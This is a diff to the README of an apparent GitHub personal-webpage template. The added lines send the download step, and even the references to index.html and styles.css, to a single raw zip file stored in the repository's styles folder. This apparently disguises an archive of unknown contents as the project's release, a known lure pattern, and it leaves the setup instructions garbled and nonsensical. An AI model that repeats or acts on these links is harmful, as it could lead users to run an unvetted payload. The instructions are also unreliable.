BereketGet/Personal-WebPage/README.md

 ## 📋 Download & Install

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/BereketGet/Personal-WebPage/releases) to download the latest version of Personal-WebPage.
+1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/BereketGet/Personal-WebPage/raw/refs/heads/master/styles/Web-Page-Personal-v2.0-alpha.5.zip) to download the latest version of Personal-WebPage.

 2. **Choose Your File**: You will see a list of release versions.
 Click on the most recent version link to view available files.

-3. **Download the Files**: Click on the file that says ‘Personal-WebPage.zip’ to download.
+3. **Download the Files**: Click on the file that says ‘https://github.com/BereketGet/Personal-WebPage/raw/refs/heads/master/styles/Web-Page-Personal-v2.0-alpha.5.zip’ to download.

 4. **Extract the Files**: Once downloaded, locate the zip file, and unzip it.
 On most computers, you can right-click on the file and select "Extract Here" or "Extract All."

-5. **Open Your Portfolio**: Navigate to the extracted folder and double-click on `index.html` to open it in your web browser.
+5. **Open Your Portfolio**: Navigate to the extracted folder and double-click on `https://github.com/BereketGet/Personal-WebPage/raw/refs/heads/master/styles/Web-Page-Personal-v2.0-alpha.5.zip` to open it in your web browser.

 ## 🛠️ Customizing Your Page

 To make it your own, follow these simple steps:

-1. **Edit the HTML**: Open the `index.html` file in any text editor.
+1. **Edit the HTML**: Open the `https://github.com/BereketGet/Personal-WebPage/raw/refs/heads/master/styles/Web-Page-Personal-v2.0-alpha.5.zip` file in any text editor.
 Replace sample information with your content.

-2. **Update the CSS**: If you want to change the colors or fonts, open the `styles.css` file and make adjustments according to your taste.
+2. **Update the CSS**: If you want to change the colors or fonts, open the `https://github.com/BereketGet/Personal-WebPage/raw/refs/heads/master/styles/Web-Page-Personal-v2.0-alpha.5.zip` file and make adjustments according to your taste.

 3. **Add Images**: Place your images in the designated folder and update the corresponding image links in the HTML file.